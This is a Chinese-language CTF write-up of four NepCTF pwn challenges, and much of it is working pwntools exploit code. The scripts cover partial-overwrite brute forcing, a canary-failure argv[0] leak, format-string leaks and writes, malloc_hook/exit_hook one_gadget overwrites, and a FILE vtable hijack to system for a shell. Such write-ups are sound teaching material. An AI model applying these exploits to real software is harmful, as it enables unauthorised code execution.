NepCTF pwn writeup
上周抽时间打了nepnep举办的CTF比赛,pwn题目出的挺不错的,适合我这种只会一点点选手做,都可以学到新东西。
[签到] 送你一朵小红花
64位程序,保护全开。
程序会在buf[2]处留下一个data段的地址,可以覆盖这个地址的后两个字节,使得有1/16的几率,可以让程序执行到puts5函数,就可以拿flag了。直接写代码爆破就可。
1 from pwn import * 2 3 context.log_level = 'debug' 4 flag = '' 5 #4E1 6 7 while 1: 8 try: 9 #p = process('./pwn') 10 p = remote('node2.hackingfor.fun',37819 11 payload = 'a'*0x10+'\xe1\xa4' 12 p.send(payload) 13 flag = p.recvuntil('}') 14 print flag 15 break 16 except: 17 p.close()
easystack
这道题卡了好久,后来问其他师傅要的exp看了,才做出来,又学到一种canary的骚操作。
在cancry被破坏的时候,程序会调用一系列相关函数,其中会有输出。
可以看到,在_fortify_fail()函数中,是会输出一句话的,而第二个参数是__libc_argv[0],在main函数中参数argv[0]是会显示运行程序的路径的,这个值被保存在栈空间中。
截图是程序start开始的第一步,可看到是向栈中压入了两个值,其中0x1是程序执行时参数的个数,而下面的0x7fffffffe1d9中保存的信息就是我这个程序在本地运行是时候的路径。(这里没有显示完全)
所以这道题的思路就出来了。程序先将flag读取到bss段,然后有一个gets函数让输入,虽然我们这里会破坏canary,但是只要将0x7fffffffde58覆盖成bss段存flag的地址,就可以在出发canary的时候将flag输出出来。
这种方法使用于可以无限溢出,并且知道flag保存的地址,并且开启了canary的时候使用。
1 from pwn import * 2 3 p = process('./pwn') 4 #p = remote('node2.hackingfor.fun',32705) 5 context.log_level = 'debug' 6 7 flag_addr = 0x0006CDE20 8 payload = 'a'*0x1c8+p64(flag_addr) 9 p.sendline(payload) 10 #p.sendlineafter('answer!!',payload) 11 p.recv()
scmt
这道题还算简单,格式化字符串泄露信息,然后就可以拿到shell了。
1 from pwn import * 2 3 p = process('./pwn') 4 #p = remote('node2.hackingfor.fun',30498) 5 elf = ELF('./pwn') 6 context(os='linux',arch='amd64',log_level='debug') 7 8 p.sendlineafter('name:\n','%8$p') 9 p.recvuntil('!!!') 10 num = int(p.recvuntil('\n')[:-1],16) 11 p.sendlineafter('number:\n',str(num)) 12 p.interactive()
superpowers
考点是flie结构体,是2.23环境下的题目。
可以打开任意文件并进行输出,但是不能打开带有flag字符的文件。这里利用/proc系统来获取libc基地址。后面有一个格式化字符串漏洞可以进行任意位置的读写。
这题我用两种方法做出来了。但是自己想的第一种方法只在自己本地复现。
1.泄露libc基地址后,利用任意写,打exit_hook为main函数地址,打__malloc_hook为realloc的,打realloc为one_gadgets,当程序返回到main函数,再次输入/proc/self/maps,此时程序会调用malloc,就会触发one_gadgets。因为是32位程序,one_gadgets大多数都不能用,只能再利用realloc进行抬栈。本地可以复现。远程没有打通的原因是我本地和远程的环境不一样,exit_hook与远程环境的偏移不同,导致远程没做出来。
2.泄露libc基地址后,改写fp指针,将fp指针指向bss段可以控制的地方,改写vtable指向可以控制的地方,因为程序中调用了fclose,会调用虚表中的close函数,这里可以把close函数的位置写成system函数的位置,并且将file结构体中的flag字段设置为'/bin/sh'字符串,就可以拿到shell了。(后面会专门开一个帖子记录io题目的做法)
打exit_hook的exp:
1 from pwn import * 2 3 p = process('./pwn') 4 #p = remote('node2.hackingfor.fun',34275) 5 elf = ELF('./pwn') 6 libc = ELF('./libc.so.6') 7 context(log_level='debug',arch='i386',os='linux') 8 9 og = [0x3ac6c,0x3ac6e,0x3ac72,0x3ac79,0x5fbd5,0x5fbd6] 10 11 p.sendlineafter('filename:','/proc/self/maps') 12 p.recvuntil('-f7') 13 libc_base = int(p.recvuntil('-f7')[-11:-3],16) 14 print 'libc_base-->'+hex(libc_base) 15 16 exit_hook = libc_base+0x1fd818 17 18 shell = libc_base+og[0] 19 main = 0x0804864B 20 malloc_hook = libc_base+libc.symbols['__malloc_hook'] 21 realloc = libc_base+libc.symbols['realloc'] 22 realloc_hook = libc_base+libc.symbols['__realloc_hook'] 23 malloc = libc_base+libc.symbols['malloc'] 24 system = libc_base+libc.symbols['system'] 25 26 payload = fmtstr_payload(27,{exit_hook:main,malloc_hook:realloc+4,realloc_hook:shell}) 27 p.sendafter('name?',payload) 28 29 p.sendlineafter('filename:','/proc/self/maps') 30 p.interactive()
打file结构体的exp:
1 from pwn import * 2 3 p = process(['./pwn'],env={"LD_PRELOAD":"./libc.so"}) 4 #p = remote('node2.hackingfor.fun',34275) 5 elf = ELF('./pwn') 6 libc = ELF('./libc.so') 7 context(log_level = 'debug', arch = 'i386', os = 'linux') 8 9 p.sendlineafter('filename:','/proc/self/maps') 10 p.recvuntil('-f7') 11 libc_base = int(p.recvuntil('-f7')[-11:-3],16) 12 print 'libc_base-->'+hex(libc_base) 13 14 main = 0x0804864B 15 system = libc_base+libc.symbols['system'] 16 17 fd = 0x0804A04C 18 fake_flag = 0x0804A050 19 fake_lock = fake_flag+0x48 20 fake_vtable = 0x0804A050+0x94 21 22 payload = fmtstr_payload(27,{fd:0x0804A050,fake_flag:'\x73\x68\x00',fake_lock:0x0804A050+0x200,fake_vtable:0x0804A050+0x200,0x0804A050+0x200+68:system}) 23 p.sendafter('name?',payload) 24 p.interactive()
